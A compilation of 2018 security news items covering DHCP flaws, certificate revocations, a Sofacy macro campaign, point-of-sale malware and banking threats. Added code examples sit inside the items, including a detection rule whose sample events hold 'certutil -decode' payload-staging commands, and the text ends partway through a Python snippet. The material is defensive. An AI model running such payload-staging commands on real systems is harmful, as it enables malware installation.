“While several platforms have been removing more illegal content than ever before — showing that self-regulation can work — we still need to react faster against terrorist propaganda and other illegal content,” said the commission’s vice-president for the Digital Single Market Andrus Ansip.

This content remains “a serious threat to our citizens’ security, safety, and fundamental rights,” he added.

Ansip also wrote on Twitter on March 1, 2018: “What is illegal offline is also illegal online. Limited liability system under EU's #eCommerce law already works well – it should stay in place. My statement at press conference on fighting illegal content online: http://bit.ly/2oJGgTw”
See Andrus Ansip's other Tweets
Twitter Ads info and privacy
The European Commission recognized the results achieved by internet firms in combatting illegal content, but the adversaries are very active and there is still a lot of work to do.

The Commission said there is “significant scope for more effective action, particularly on the most urgent issue of terrorist content, which presents serious security risks”.

The European Commission expects terrorist content to be taken down within one hour of being reported by the authorities; it also urges stricter monitoring and proactive action against illegal content.

The EU suggests the adoption of automated detection systems that could help tech firms rapidly identify harmful content and any attempt to re-upload removed illegal content.

The new recommendations also specifically address other types of harmful illegal content, such as hate speech and images of child sexual abuse.

“Illegal content means any information which is not in compliance with EU law or the law of a Member State. This includes terrorist content, child sexual abuse material (Directive on combating sexual abuse of children), illegal hate speech (Framework Decision on combating certain forms and expressions of racism and xenophobia by means of criminal law), commercial scams and frauds (such as Unfair commercial practices directive or Consumer rights directive) or breaches of intellectual property rights (such as Directive on the harmonisation of certain aspects of copyright and related rights in the information society),” continues the EC.

“Terrorist content is any material which amounts to terrorist offences under the EU Directive on combating terrorism or under national laws — including material produced by, or attributable to, EU or UN listed terrorist organisations.”

According to the commission, internet firms removed 70 percent of illegal content notified to them in the preceding few months.

Apple Moves iCloud Data and Encryption Keys for Chinese Users to China
2.3.2018 thehackernews Apple

Apple has finally agreed to open a new Chinese data center next month to comply with the country's latest controversial data protection law.
Apple will now move the cryptographic keys of its Chinese iCloud users to data centers run by a state-owned company called Cloud Big Data Industrial Development Co, despite concerns from human rights activists.
In 2017, China passed a Cybersecurity Law that requires "critical information infrastructure operators" to store Chinese users' data within the country's borders, which likely forced Apple to partner with the new Chinese data center.
The icing on the cake is that the Chinese government already has legislation called the National Security Law, passed in 2015, which gives police the authority to demand that companies help them bypass encryption or other security tools to access personal data.
This is the first time Apple will store the encryption keys required to unlock its users' iCloud accounts outside the United States.
In theory, Chinese law enforcement agencies won't have to ask US courts to compel Apple to give them access to Chinese users’ data.
Instead, they'll simply use their legal system to demand access to cryptographic keys required to unlock iCloud accounts stored within their nation, making it far easier to access users’ data, such as messages, emails, and photos.
However, Apple has said the company alone would have access to the iCloud encryption keys and that Chinese authorities will have no backdoor into its data troves.
Apple said the company had not given any of its customers account information to Chinese authorities despite receiving 176 requests from 2013 to 2017, Reuters reported, though all requests were made before the new cybersecurity laws took effect.
If Apple thinks it can comply with one law, i.e., storing users' data in China, while declining to comply with other stringent Chinese regulations, the company should reconsider its decision.
The company has been strictly implementing various aspects of Chinese law in recent months for its regional operations in the world's most populated country.
Last year, Apple controversially removed VPN apps from its official App Store in China to comply with Chinese cyberspace regulations, making it harder for internet users to bypass its Great Firewall.
Earlier last year, Apple removed the New York Times (NYT) app from its Chinese App Store because the app was in "violation of local regulations."

A Simple Bug Revealed Admins of Facebook Pages — Find Out How

2.3.2018 thehackernews Social

Facebook Page admins are publicly displayed only if admins have chosen to feature their profiles.
However, there are some situations where you might want to contact a Facebook page admin or want to find out who is the owner of a Facebook page.
Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have allowed anyone to expose Facebook page administrator profiles, which is otherwise not supposed to be public information.
Baset claimed to have discovered the vulnerability in less than 3 minutes without any kind of testing or proof of concepts, or any other type of time-consuming processes.

In a blog post, Baset said he found the vulnerability, which he described as a "logical error," after receiving an invitation to like a particular Facebook page on which he had previously liked a post.
Facebook has introduced a feature for page admins wherein they can send Facebook invitations to users asking them if they wished to like their page after liking a post, and a few days later, these interacted users may receive an email reminding them of the invitation.
After Baset received one such email invite, he simply opened the "show original" option in the email's drop-down menu. Looking at the email's source code, he noticed that it included the page administrator's name, admin ID and other details.
The researcher then immediately reported the issue to the Facebook Security Team through its Bugcrowd bug bounty program. The company acknowledged the bug and awarded Baset $2,500 for his findings.
Though Facebook has now patched this information disclosure issue, people who have already received one such page invitation can still find out admin details from the invitation emails.
"We were able to verify that under some circumstances page invitations sent to non-friends would inadvertently reveal the name of the page admin which sent them," Facebook said. "We've addressed the root cause here, and future emails will not contain that information."

Bugcrowd Raises $26 Million to Expand Vulnerability Hunting Business
2.3.2018 securityweek 

Crowdsourced security testing company Bugcrowd announced today that it has closed $26 million in a Series C funding round led by Triangle Peak Partners.

The new funding brings the total amount raised by the company to $50 million, including $15 million raised in a Series B funding round in 2016.

The company’s flagship “Crowdcontrol” offering is a software-as-a-service platform that allows organizations to run their own customized bug bounty programs to uncover and resolve security vulnerabilities in their products.

The new funding will be used to support product innovation and program management, the company said.

Bugcrowd currently operates the rewards programs of more than 70 different companies, including security firms BitDefender, Centrify, NETGEAR, 1Password, Okta, Cylance and LastPass. Industry customers include MasterClass, Fiat Chrysler, Square, Fitbit, Mastercard, Tesla and Western Union. A recently announced Samsung Electronics Mobile Security program rewards security researchers up to $200,000 per vulnerability, depending on its severity.

Existing investors Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Stanford participated in the Series C round, along with new investors Hostplus and First State Super.

Remotely Exploitable Flaws Patched in DHCP
2.3.2018 securityweek 

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.
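The advisory's description of a 32-bit reference counter that wraps after billions of increments can be illustrated with a small model. The C program below is an added example, not ISC's dhcpd code: the struct, the function names and the `freed` flag (which stands in for an actual free() so the demo stays safe) are invented here, and the counter is started just below UINT32_MAX so the wrap can be shown without billions of iterations. It shows how an unchecked increment wraps to zero, so that a later release frees an object that still has live holders, and how a checked increment that refuses to wrap and reports failure to the caller prevents that.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Toy object with a 32-bit reference count, modelled loosely on the class
 * of bug described in the advisory. Added illustration, not dhcpd code;
 * the field and function names are invented for this example. */
struct refobj {
    uint32_t refcnt;
    bool     freed;   /* set instead of calling free(), so the demo stays safe */
};

/* Unchecked increment: unsigned arithmetic wraps silently at UINT32_MAX. */
static void ref_inc_unchecked(struct refobj *o)
{
    o->refcnt++;
}

/* Checked increment: refuses to wrap and tells the caller it failed, so the
 * caller can drop the request (or the client) instead of corrupting state. */
static bool ref_inc_checked(struct refobj *o)
{
    if (o->refcnt == UINT32_MAX)
        return false;
    o->refcnt++;
    return true;
}

/* Release one reference; the object is "freed" when the count hits zero. */
static void ref_dec(struct refobj *o)
{
    if (o->refcnt == 0) {      /* release with no references left: already a bug */
        o->freed = true;
        return;
    }
    if (--o->refcnt == 0)
        o->freed = true;
}

/* Model the attack: the counter is already near its limit (standing in for
 * billions of packets), a few more references are taken, one is released.
 * Returns true if the object ends up freed while other holders remain. */
bool demo_wrap_frees_live_object(void)
{
    struct refobj o = { .refcnt = UINT32_MAX - 1, .freed = false };
    ref_inc_unchecked(&o);   /* -> UINT32_MAX */
    ref_inc_unchecked(&o);   /* wraps -> 0: 2^32 live holders, count says none */
    ref_inc_unchecked(&o);   /* -> 1 */
    ref_dec(&o);             /* -> 0: object "freed" while others still hold it */
    return o.freed;
}

/* Same sequence with the checked increment: the wrap is refused and the
 * object stays live with a sane count. */
bool demo_checked_refuses_wrap(void)
{
    struct refobj o = { .refcnt = UINT32_MAX - 1, .freed = false };
    bool ok1 = ref_inc_checked(&o);   /* -> UINT32_MAX, succeeds */
    bool ok2 = ref_inc_checked(&o);   /* refused, count unchanged */
    ref_dec(&o);                      /* -> UINT32_MAX - 1, still live */
    return ok1 && !ok2 && !o.freed && o.refcnt == UINT32_MAX - 1;
}

int main(void)
{
    printf("unchecked counter frees a live object: %s\n",
           demo_wrap_frees_live_object() ? "yes" : "no");
    printf("checked counter refuses to wrap:       %s\n",
           demo_checked_refuses_wrap() ? "yes" : "no");
    return 0;
}
```

The point of the checked variant is that a failed increment is a visible, loggable event that the server can handle (refuse the request, drop the client), whereas the wrap in the unchecked variant is silent until the object is torn down under a live reference.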

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.

23,000 Digital Certificates Revoked in DigiCert-Trustico Spat
2.3.2018 securityweek Security

Digicert vs Trustico

Certificate Authority (CA) DigiCert on Wednesday announced the en masse revocation of more than 23,000 HTTPS certificates after certificate reseller Trustico sent over the private keys for those certificates.

The keys are supposed to be secret and only in the possession of certificate owners, not in the hands of the certificate authority, the reseller or any other third party. With the private keys exposed, DigiCert was forced to revoke impacted certificates within 24 hours, thus affecting a large number of customers.

The revocation appears to be the result of a one-month feud between Trustico and DigiCert and might evolve into an even larger number of certificates being axed.

This all apparently started on February 2, 2018, when Trustico sent a request to DigiCert “to mass revoke all certificates that had been ordered by end users through Trustico,” Jeremy Rowley, Executive VP of Product at DigiCert, explains. The CA refused, given the large number of certificates it was asked to revoke at once (50,000).

In August last year, DigiCert announced plans to buy Symantec’s website security and related public key infrastructure (PKI) solutions, after Symantec ended up in the crosshairs for wrongfully issuing TLS certificates on several occasions. Since December 1, 2017, Symantec SSL certificates have been issued by DigiCert.

With major browsers already announcing plans to distrust older Symantec certificates, Trustico too decided to abandon those certificates, and announced in mid-February that it would cease to offer Symantec branded SSL Certificates: Symantec, GeoTrust, Thawte and RapidSSL.

“As a valued partner of Comodo, Trustico have updated their systems to minimize disruption to customers with their API and ordering processes by enabling the automatic selection and ordering of equivalent products from the Comodo range,” Trustico said at the time.

A couple of weeks later, on February 27, Trustico sent DigiCert a file with 23,000 private keys matching certificates issued to the reseller’s customers, which triggered a 24-hour revocation process.

“Trustico’s CEO indicated that Trustico held the private keys for those certificates, and then emailed us approximately 20,000 certificate private keys. When he sent us those keys, his action gave us no choice but to act in accordance with the CA/Browser Forum Baseline Requirements, which mandate that we revoke a compromised certificate within 24 hours,” DigiCert said in a Wednesday statement.

Because of these actions, starting today, visitors to impacted websites will see in their browsers that the connection to the domain is untrusted, unless the revoked certificates have been replaced in the meantime.

Since the beginning of February, DigiCert and Trustico have been communicating with each other over this, but each company has a different side of the story.

According to DigiCert, Trustico informed them that the certificates had been compromised and that it was in the possession of said private keys. Thus, DigiCert requested proof of compromise and received said keys.

“At this time, Trustico has not provided any information about how these certificates were compromised or how they acquired the private keys. As is standard practice for a Certificate Authority, DigiCert never had possession of these private keys,” Rowley says.

In addition to revoking the certificates, DigiCert decided to email all impacted customers to inform them on its action: “Following our standard revocation process, we gave notice via email to each certificate holder whose private keys had been exposed to us by Trustico, so they could have time to get a replacement certificate.”

Trustico, on the other hand, claims that it never said the certificates had been compromised, but that it informed DigiCert that it believed “Symantec to have operated our account in a manner whereby it had been compromised.”

The reseller also says that it doesn’t believe it to be “ideal to have any active SSL Certificates on the Symantec systems,” especially with Chrome set to distrust all Symantec SSL certificates.

“The same management team responsible for that situation is duly employed at DigiCert and is fully managing our account, causing grave concern on our part as it appears to be business as usual with a new name. We were also a victim whereby Symantec mis-issued SSL Certificates owned by us; subsequently we were asked to keep the matter quiet, under a confidentiality notice,” the company claims.

Moreover, Trustico points out that it never authorized DigiCert to email its customers about the revocation, but adds that it too sent a notice to the impacted clients.

The bottom line here, however, is the fact that DigiCert ended up revoking 23,000 HTTPS certificates because their private keys were compromised. Even if the keys hadn’t been compromised when the spat started, the fact that the reseller sent those keys in an email represented a compromise in itself.

“In communications today, Trustico has suggested that this revocation is due to the upcoming Google Chrome distrust of Symantec roots. That is incorrect. We want to make it clear that the certificates needed to be revoked because Trustico sent us the private keys; this has nothing to do with future potential distrust dates,” DigiCert points out.

The fact that Trustico kept those private keys on their platform is also worrisome.

Both Trustico and DigiCert said they would be working with the impacted customers to replace the axed certificates and that free replacement certificates are available for those clients.

Russia-linked Hackers Directly Targeting Diplomats: Report
2.3.2018 securityweek  APT

The Russia-linked cyber espionage group Sofacy has been targeting foreign affairs agencies and ministries worldwide in a recently discovered campaign, Palo Alto Networks warns.

The hacking group, also known as APT28, Fancy Bear, Pawn Storm, Sednit, Tsar Team, and Strontium, has been highly active recently, and new evidence shows activity directly targeting diplomats in North America and Europe, including those at a European embassy in Moscow.

Sofacy was supposedly behind the attacks on the 2016 United States presidential election, but also hit Ukraine and NATO countries. In fact, the group heavily targeted NATO in early 2017, when it even used zero-day exploits, but then started to shift its focus towards the Middle East and Central Asia.

Palo Alto Networks has now uncovered two parallel efforts within a new Sofacy campaign, each using its own set of tools. In early February 2018, one of the efforts was observed using phishing emails as the attack vector to target an organization in Europe and another in North America.

The message spoofed the sender address of Jane’s by IHSMarkit, a well-known supplier of information and analysis. The email carried an attachment claiming to be a calendar of events relevant to the targeted organizations, but was a Microsoft Excel spreadsheet containing a malicious macro script.

The attackers used a white font color to hide the content of the document from the victim and lure them into enabling macros. Once that happens, the script changes the text color to black.

The macro also retrieves content from several cells to obtain a base64 encoded payload, writes it to a text file in the ProgramData folder, and leverages the command certutil -decode to decode the contents to an .exe file, which it runs after two seconds.

The executable is a loader Trojan that decrypts an embedded payload (DLL) and saves it to a file. Next, it creates a batch file to run the DLL payload, and writes the path to the batch file to a registry key, for persistence.
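The chain described above leaves a distinctive trace on the host: an Office process (or a shell it spawned) running certutil with -decode against a file under ProgramData. The C program below is an added detection example, not Palo Alto Networks' code and not the macro itself: it scores constructed process-creation events (parent image plus command line, invented here) against those three indicators and flags anything matching at least two. That threshold generalizes slightly beyond the reported case, so a certutil -decode run from a user's Downloads folder under an Office parent is still caught, while a legitimate certutil -verify from a command prompt is not. In practice the events would come from a process-creation telemetry feed; here they are embedded inline.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* One process-creation event: the parent image and the new process's
 * command line. Field names are invented for this example. */
struct proc_event {
    const char *parent;
    const char *cmdline;
};

/* Constructed sample events (not real telemetry). Event 1 mirrors the chain
 * described in the article; the others are benign or partial matches. */
const struct proc_event sample_events[] = {
    { "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
      "certutil -decode C:\\ProgramData\\calendar.txt C:\\ProgramData\\calendar.exe" },
    { "C:\\Windows\\System32\\cmd.exe",
      "certutil -decode C:\\ProgramData\\blob.txt C:\\ProgramData\\blob.exe" },
    { "C:\\Windows\\System32\\cmd.exe",
      "certutil -verify C:\\Users\\alice\\Desktop\\site.cer" },
    { "C:\\Windows\\System32\\services.exe",
      "C:\\Windows\\System32\\svchost.exe -k netsvcs" },
    { "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
      "certutil -decode C:\\Users\\alice\\Downloads\\a.txt C:\\Users\\alice\\Downloads\\a.exe" },
};
const size_t n_sample_events = sizeof sample_events / sizeof sample_events[0];

/* Case-insensitive substring search; strcasestr() is not portable. */
static bool contains_ci(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return true;
    }
    return false;
}

/* Score an event 0..3. A certutil invocation earns one point each for the
 * -decode switch, a path under \ProgramData\, and an Office parent process.
 * Anything that is not certutil scores 0. */
int score_certutil_decode(const struct proc_event *e)
{
    if (!contains_ci(e->cmdline, "certutil"))
        return 0;
    int score = 0;
    if (contains_ci(e->cmdline, "-decode"))
        score++;
    if (contains_ci(e->cmdline, "\\ProgramData\\"))
        score++;
    if (contains_ci(e->parent, "excel.exe") || contains_ci(e->parent, "winword.exe"))
        score++;
    return score;
}

/* Alert threshold: two or more indicators present. */
bool is_suspicious(const struct proc_event *e)
{
    return score_certutil_decode(e) >= 2;
}

/* Run the rule over the embedded sample and return the number of alerts. */
int count_alerts(void)
{
    int alerts = 0;
    for (size_t i = 0; i < n_sample_events; i++)
        if (is_suspicious(&sample_events[i]))
            alerts++;
    return alerts;
}

int main(void)
{
    for (size_t i = 0; i < n_sample_events; i++)
        printf("event %zu: score %d %s\n", i + 1,
               score_certutil_decode(&sample_events[i]),
               is_suspicious(&sample_events[i]) ? "ALERT" : "ok");
    printf("%d alert(s) out of %zu events\n", count_alerts(), n_sample_events);
    return 0;
}
```

Scoring rather than matching a single exact command line is deliberate: the report notes that the path to the .txt and .exe files is the one thing that varies between this macro and the Luckystrike template, so a rule keyed on the exact path would miss the next variant, while the combination of decode switch, staging directory and Office parent is stable.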

The installed malware is a variant of SofacyCarberp, which has been extensively used by the threat group in attacks. The malware performs initial reconnaissance by gathering system information, then sends the data to the command and control (C&C) server and fetches additional tools.

Both the loader and the SofacyCarberp variant used in the attack are similar to samples previously analyzed, yet they include several differences, such as a new hashing algorithm to resolve API functions and find browser processes for injection, and modified C&C communication mechanisms.

The security researchers also believe the group may have used the Luckystrike open-source tool to generate the malicious document and/or the macro, as the macro in the document closely resembles those found within the Microsoft PowerShell-based tool. The only difference between the two, besides random function name and random cell values, would be the path to the “.txt” and “.exe” files.

The security researchers also noticed that the Sofacy group registered new domains as part of the campaign, but that it used a default landing page they employed in other attacks as well. The domain used in this attack, cdnverify[.]net was registered on January 30, 2018.

“No other parts of the C&C infrastructure amongst these domains contained any overlapping artifacts. Instead, the actual content within the body of the websites was an exact match in each instance,” Palo Alto notes.

“The Sofacy group should no longer be an unfamiliar threat at this stage. They have been well documented and well researched with much of their attack methodologies exposed. They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past. This leads us to believe that their attack attempts are likely still succeeding, even with the wealth of threat intelligence available in the public domain,” Palo Alto concludes.

Hundreds of Tim Hortons outlets across Canada closed after malware attack
2.3.2018 securityaffairs

Tim Hortons restaurants across Canada have been hit by malware that forced some locations to shut down over the past week.
When it comes to cyber threats to the retail sector, Target is the most prominent case of the potential damage a cyber attack can cause.

Today I want to report the case of a malware-based attack that hit the payment systems of hundreds of Tim Hortons restaurants across Canada, forcing many of them to close.

“The company told the Globe and Mail that the virus hit fewer than 100 locations, attacking the Panasonic cash registers that the chain uses.” reported the Huffington Post Canada.

“But a source close to the issue told HuffPost Canada that as many as 1,000 Tim Hortons locations may have been impacted, amounting to roughly a quarter of all Canadian locations. Some locations were forced to close, while others had to shut down their drive-throughs.”

At the time of writing, there are no details about the type of malware that infected the systems at Tim Hortons restaurants. CTV News, quoting sources close to the incident, reported that the malicious code was specifically designed to target cash registers, making them unusable.

“The cash registers just plain don’t work,” the source told the news station. “Many of the stores had to close totally.”

The Great White North Franchisee Association (GWNFA), which represents Tim Hortons franchisees, is expected to take legal action against Restaurant Brands International (RBI), the operator of Tim Hortons.

GWNFA blames RBI for lost revenue and, of course, reputational damage.

In a letter obtained by the Globe and the Canadian Press, Tim Hortons franchisees belonging to the Great White North Franchisee Association asked head office for compensation for losses due to the virus.

“The business interruption includes inability to use some or all of the … issued cash registers and [point-of-sale] terminals, causing partial and complete store closures, franchisees paying employees not to work, lost sales and product spoilage,” the letter from law firm Himelfarb Proszanski reportedly stated.

The letter defined the incident “a failure” and noted that it comes “on the heels of the public relations debacle” from January when two Cobourg, Ont. franchises owned by Ron Joyce Jr. and Jeri Horton-Joyce, the children of the company’s billionaire co-founders, moved to offset the province’s minimum wage hike by cutting paid breaks and forcing workers to cover a bigger share of their benefits.

According to CTV News, RBI declared that no financial data (i.e., credit card information) or other sensitive data was stolen by the hackers.

Financial Cyberthreats in 2017
2.3.2018 Kaspersky Cyber
In 2017, we saw a number of changes to the world of financial threats and new actors emerging. As we have previously noted, fraud attacks in financial services have become increasingly account-centric. User data is a key enabler for large-scale fraud attacks, and frequent data breaches – among other successful attack types – have provided cybercriminals with valuable sources of personal information to use in account takeovers or false identity attacks. These account-centric attacks can result in many other losses, including those of further customer data and trust, so mitigation is as important as ever for both businesses and financial services customers.

Attacks on ATMs continued to rise in 2017, attracting the attention of many cybercriminals, with attackers targeting bank infrastructure and payment systems using sophisticated fileless malware, as well as the more rudimentary methods of taping over CCTVs and drilling holes. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars, along with a step-by-step user guide. Kaspersky Lab has published a report outlining possible future ATM attack scenarios targeting ATM authentication systems.

It is also worth mentioning that major cyber incidents continue to take place. In September 2017, Kaspersky Lab researchers identified a new series of targeted attacks against at least 10 financial organizations in multiple regions, including Russia, Armenia, and Malaysia. The hits were performed by a new group called Silence. While stealing funds from its victims, Silence implemented specific techniques similar to the infamous threat actor, Carbanak.

Thus, Silence joins the ranks of the most devastating and complex cyber-robbery operations like Metel, GCMAN and Carbanak/Cobalt, which have succeeded in stealing millions of dollars from financial organizations. The interesting point to note with this actor is that the criminals exploit the infrastructure of already infected financial institutions for new attacks: sending emails from real employee addresses to a new victim, along with a request to open a bank account. Using this trick, criminals make sure the recipient doesn’t suspect the infection vector.

Small and medium-sized businesses didn’t escape financial threats either. Last year Kaspersky Lab’s researchers discovered a new botnet that cashes in on aggressive advertising, mostly in Germany and the US. Criminals infect their victims’ computers with the Magala Trojan Clicker, generating fake ad views and making up to $350 from each machine. Small enterprises lose out most because they end up doing business with unscrupulous advertisers, without even knowing it.

Moving down one more step – from SMEs to individual users – we can say that 2017 didn’t give the latter much respite from financial threats. Kaspersky Lab researchers detected NukeBot – a new malware designed to steal the credentials of online banking customers. Earlier versions of the Trojan were known to the security industry as TinyNuke, but they lacked the features necessary to launch attacks. The latest versions however, are fully operable, and contain code to target the users of specific banks.

This report summarizes a series of Kaspersky Lab reports that between them provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats that users encounter, along with Windows-based and Android-based financial malware.

The key findings of the report are:

In 2017, the share of financial phishing increased from 47.5% to almost 54% of all phishing detections. This is an all-time high, according to Kaspersky Lab statistics for financial phishing.
More than one in four attempts to load a phishing page blocked by Kaspersky Lab products is related to banking phishing.
The share of phishing related to payment systems and online shops accounted for almost 16% and 11% respectively in 2017. This is slightly more (single percentage points) than in 2016.
The share of financial phishing encountered by Mac users nearly doubled, accounting for almost 56%.
Banking malware:
In 2017, the number of users attacked with banking Trojans was 767,072, a decrease of 30% on 2016 (1,088,900).
19% of users attacked with banking malware were corporate users.
Users in Germany, Russia, China, India, Vietnam, Brazil and the US were the most often attacked by banking malware.
Zbot is still the most widespread banking malware family (almost 33% of attacked users), but is now being challenged by the Gozi family (27.8%).
Android banking malware:
In 2017, the number of users that encountered Android banking malware decreased by almost 15% to 259,828 worldwide.
Just three banking malware families accounted for attacks on the vast majority of users (over 70%).
Russia, Australia and Turkmenistan were the countries with the highest percentage of users attacked by Android banking malware.

SecOps: The Roadkill Victim of DevOps' Need for Speed
1.3.2018 securityweek Security

DevSecOps Remains a Theory Not Often Implemented in Practice

DevOps was born from the understanding that greater efficiency comes from breaking down business silos (in this case, development and operations) and working as a single unit. With the increasing understanding and regulatory demands that security should be baked into new products during their development, the logical extension is that security should be included in a new combined working model: DevSecOps.

The potential advantages of DevSecOps are well understood and frequently urged -- but not so commonly implemented. A new survey and report (PDF) from threat detection firm Threat Stack demonstrates that DevSecOps remains a theory not often implemented in practice.

Threat Stack questioned more than 200 security, development and operations professionals working for firms ranging from SMBs to large corporations in North America, across multiple industry sectors. The response shows that DevSecOps is well-understood and frequently lauded by firms, but not so often enacted.

The primary reason appears to be not just a lack of support from the highest levels, but actual discouragement from business leaders. More than half of companies (52%) admit to cutting back on security measures to meet a business deadline or objective. "Since the directive for speed starts at the very top, it's hard to ignore," comment the report's authors, "even if it means that security becomes roadkill in the process."

The demand for development speed from the business leaders then transfers to the existing DevOps team. Sixty-two percent of the respondents said that DevOps push back against demands to deploy secure technology, and 57% push back on security best practices -- presumably because implementing security is seen as incompatible with the overriding need for speed.

This is a common perception. Mike Smart, security strategist at Forcepoint, believes security is like the brake on a car. Business leaders think its purpose is to slow down the car; that is, security slows down business and business development. "Innovators will tell you the opposite," he says. "It's there to give the driver the confidence to go as fast as possible." In this view, security is the enabler of agile business -- but the implication is that security leaders have failed to adequately explain this function to the business leaders.

Surprisingly, however, the theory of DevSecOps is well received. Eighty-five percent of the responding organizations claim that bridging the gap between DevOps and security is an important goal, while 62% of developer and operations professionals say it has become a bigger priority.

Threat Stack has isolated three key factors at play in this apparent contradiction. The first is that security is still siloed and considered a separate function. "A security specialist," notes the report, "is assigned to the operations team at only 27% of the organizations we surveyed, and security pros are on board with development teams in just 18% of cases. At 38% of organizations, security is a completely separate team that is only brought in 'when needed'."

The second is that development is separate from security. "Forty-four percent of developers aren't trained to code securely. Without this basic knowledge, coding is often done without security in mind. This forces security to become a bottleneck when they must inevitably step in and intervene."

Thirdly, operations is little different. "A full 42% of operations staff admit that they are not trained in basic security practices, which means that they can't configure servers securely. It also means that they don't see deploying security as part of the configuration management process, which allows security best practices to fall by the wayside. When ops pros aren't trained in security, there's no way SecOps can succeed."

At the same time, security cannot be absolved from all responsibility for the lack of progress in DevSecOps. Just as developers can't code securely, security teams can rarely code at all. Security teams, suggests Threat Stack, "need to learn how to code and integrate their efforts into continuous deployment cycles. Don't wait for this process to happen organically; you must make a conscious investment in alignment and education across teams."

"Businesses have grappled with the 'Speed or Security' problem for years but the emergence of SecOps practices really means that companies can achieve both," said Brian Ahern, Threat Stack chairman and CEO. "The survey findings show that the vast majority of companies are bought-in, but, unfortunately, a major gap exists between intent of practicing SecOps and the reality of their fast-growing businesses. It's important that stakeholders across every enterprise prioritize the alignment of DevOps and security."

The key to developing an efficient DevSecOps regime is to break down silos -- but that includes breaking down self-imposed as well as organizationally-imposed silos.

Boston, Mass.-based intrusion detection firm Threat Stack raised $45 million in a Series C funding in September 2017, bringing the total raised by the company to more than $70 million.

Fortinet Enhances Network Security OS, Adds AI-based Threat Detection
1.3.2018 securityweek Security

Two major new product announcements were made at Fortinet’s Accelerate 18 conference this week, including a new machine learning (ML) threat intelligence and detection offering, along with a major upgrade to the Fortinet Security Fabric (FortiOS).

Accelerate 18, held in Las Vegas, Nevada, is Fortinet's annual global partner and user conference, attended by around 2,000 Fortinet partners, customers, and industry and technical experts.

The new ML product is called FortiGuard AI. It emerges from five years of analyses by FortiGuard Labs' 215 researchers in 31 countries analyzing the threat data from a global network of more than 3 million security sensors. The analyses have been used, employing supervised learning techniques, to train the FortiGuard AI automatic detection engine.

Machine learning threat detection is currently one of the best options for detecting new and unknown malware, but the accuracy of any such system depends on the volume and quality of the data it learns from. By spending five years on the process and using supervised learning (training on samples that analysts have labeled as clean or malicious) rather than unsupervised learning, Fortinet should have produced a high-quality model. The caveat that applies to every supervised detector also applies here: it is only as good as its labels, and samples unlike anything in the training set can still slip through.

The system now analyzes millions of threat samples every week. More than 5 billion processing nodes identify both the clean and malicious features of the threat samples to generate threat intelligence. That intelligence then automatically updates defensive signatures across the entire Fortinet Security Fabric.

"Fortinet Labs' five-year investment in automated analysis and detection of polymorphic threats," comments CISO Phil Quade, "has resulted in FortiGuard AI, a giant leap towards [automatically detecting polymorphic and zero-day threats]. FortiGuard AI analyzes and identifies threats with speed, agility, and accuracy to provide proactive threat detection at machine speed and scale. This frees threat analysts and network operators to focus on critical threat research and higher-order problems, reduces exposure to zero-day attacks, and minimizes the risk to Fortinet customers while increasing the attacker's costs."

The firm also announced the inclusion of ML-based User and Entity Behavior Analytics (UEBA) capabilities in its SIEM product (FortiSIEM). The solution learns patterns of normal user or entity behavior and then automatically flags deviations from them. Concurrent logins from separate locations, users accessing corporate data in the middle of the night, and excessive logins to rarely used servers will all raise alerts for the security team to act on.
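The three anomaly types listed above can be written as simple rules over a per-user and per-host baseline. The block below is an added example, not FortiSIEM code: the login events are constructed for the illustration, and the thresholds (a 30-minute window for "concurrent", a 06:00 to 22:00 working day, a host seen on fewer than two distinct days counting as "rarely used") are assumptions a real deployment would tune against its own baseline.

```python
"""Toy UEBA rules over constructed login events (added example, not FortiSIEM)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real log data: (timestamp, user, source country, host)
EVENTS = [
    ("2018-02-26 09:02:11", "alice", "DE", "fileserver01"),
    ("2018-02-27 08:55:02", "alice", "DE", "fileserver01"),
    ("2018-02-28 09:10:45", "alice", "DE", "fileserver01"),
    ("2018-02-28 09:12:30", "alice", "BR", "fileserver01"),   # second country, two minutes later
    ("2018-02-26 10:00:00", "bob",   "DE", "hr-db"),
    ("2018-02-27 10:30:00", "bob",   "DE", "hr-db"),
    ("2018-02-28 03:14:00", "bob",   "DE", "hr-db"),          # middle of the night
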